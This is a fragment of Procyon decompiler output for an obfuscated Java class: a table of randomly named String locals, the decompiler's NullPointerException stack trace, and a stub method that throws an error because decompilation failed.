        //  3083   396     465   XnwE7kj                Ljava/lang/String;
        //  3090   389     466   DyhP3zh                Ljava/lang/String;
        //  3097   382     467   ZfjS5mq                Ljava/lang/String;
        //  3104   375     468   LwuF2co                Ljava/lang/String;
        //  3111   368     469   KkwU5sz                Ljava/lang/String;
        //  3118   361     470   PulV1yw                Ljava/lang/String;
        //  3125   354     471   SdwZ9dy                Ljava/lang/String;
        //  3132   347     472   NzmU3pg                Ljava/lang/String;
        //  3169   310     473   UcpV2ys                Ljava/lang/String;
        //  3176   303     474   PcbV8ch                Ljava/lang/String;
        //  3183   296     475   FlpJ7ot                Ljava/lang/String;
        //  3190   289     476   CznE1li                Ljava/lang/String;
        //  3197   282     477   OduC3vp                Ljava/lang/String;
        //  3204   275     478   OdjL2pe                Ljava/lang/String;
        //  3211   268     479   IllE9ii                Ljava/lang/String;
        //  3218   261     480   EbyX2xg                Ljava/lang/String;
        //  3225   254     481   XzlJ3bm                Ljava/lang/String;
        //  3232   247     482   TgmH2kl                Ljava/lang/String;
        //  3239   240     483   UobD6da                Ljava/lang/String;
        //  3246   233     484   AszM5ht                Ljava/lang/String;
        //  3253   226     485   NjbV1vr                Ljava/lang/String;
        //  3260   219     486   NavW8zi                Ljava/lang/String;
        //  3267   212     487   PgpG5ri                Ljava/lang/String;
        //  3274   205     488   MctR9vu                Ljava/lang/String;
        //  3281   198     489   BleK7ko                Ljava/lang/String;
        //  3288   191     490   MezZ6zb                Ljava/lang/String;
        //  3295   184     491   EtkM5qo                Ljava/lang/String;
        //  3302   177     492   ItaU2hy                Ljava/lang/String;
        //  3309   170     493   ZvdE4zt                Ljava/lang/String;
        //  3316   163     494   TjdO6dc                Ljava/lang/String;
        //  3323   156     495   VckY9nx                Ljava/lang/String;
        //  3330   149     496   OgzA1na                Ljava/lang/String;
        //  3337   142     497   OozL9zi                Ljava/lang/String;
        //  3344   135     498   DarM6hx                Ljava/lang/String;
        //  3351   128     499   CkhQ2gm                Ljava/lang/String;
        //  3358   121     500   NqrM1ca                Ljava/lang/String;
        //  3365   114     501   AxmN5na                Ljava/lang/String;
        //  3372   107     502   LisA4wm                Ljava/lang/String;
        //  3379   100     503   EybE4gm                Ljava/lang/String;
        //  3386   93      504   UwkM7uu                Ljava/lang/String;
        //  3393   86      505   QezA9jh                Ljava/lang/String;
        //  3400   79      506   SnoF7ab                Ljava/lang/String;
        //  3407   72      507   XojG2ok                Ljava/lang/String;
        //  3414   65      508   AbpG3qj                Ljava/lang/String;
        //  3421   58      509   BvfL3pv                Ljava/lang/String;
        //  3428   51      510   RbxT4gt                Ljava/lang/String;
        //  3435   44      511   PmjW7no                Ljava/lang/String;
        //  3442   37      512   CqxV8xy                Ljava/lang/String;
        //  3449   30      513   IqyJ3pr                Ljava/lang/String;
        //  3456   23      514   VftA3wv                Ljava/lang/String;
        //  3463   16      515   XhtB8cp                Ljava/lang/String;
        //  3470   9       516   BmnA9ea                Ljava/lang/String;
        // 
        // The error that occurred was:
        // 
        // java.lang.NullPointerException
        //     at com.strobel.decompiler.ast.AstBuilder.convertLocalVariables(AstBuilder.java:2985)
        //     at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:2445)
        //     at com.strobel.decompiler.ast.AstBuilder.build(AstBuilder.java:108)
        //     at com.strobel.decompiler.languages.java.ast.AstMethodBodyBuilder.createMethodBody(AstMethodBodyBuilder.java:210)
        //     at com.strobel.decompiler.languages.java.ast.AstMethodBodyBuilder.createMethodBody(AstMethodBodyBuilder.java:99)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createMethodBody(AstBuilder.java:757)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createMethod(AstBuilder.java:655)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.addTypeMembers(AstBuilder.java:532)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createTypeCore(AstBuilder.java:499)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createTypeNoCache(AstBuilder.java:141)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createType(AstBuilder.java:130)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.addType(AstBuilder.java:105)
        //     at com.strobel.decompiler.languages.java.JavaLanguage.buildAst(JavaLanguage.java:71)
        //     at com.strobel.decompiler.languages.java.JavaLanguage.decompileType(JavaLanguage.java:59)
        //     at com.strobel.decompiler.DecompilerDriver.decompileType(DecompilerDriver.java:317)
        //     at com.strobel.decompiler.DecompilerDriver.decompileJar(DecompilerDriver.java:238)
        //     at com.strobel.decompiler.DecompilerDriver.main(DecompilerDriver.java:138)
        // 
        throw new IllegalStateException("An error occurred while decompiling this method.");
    }
}
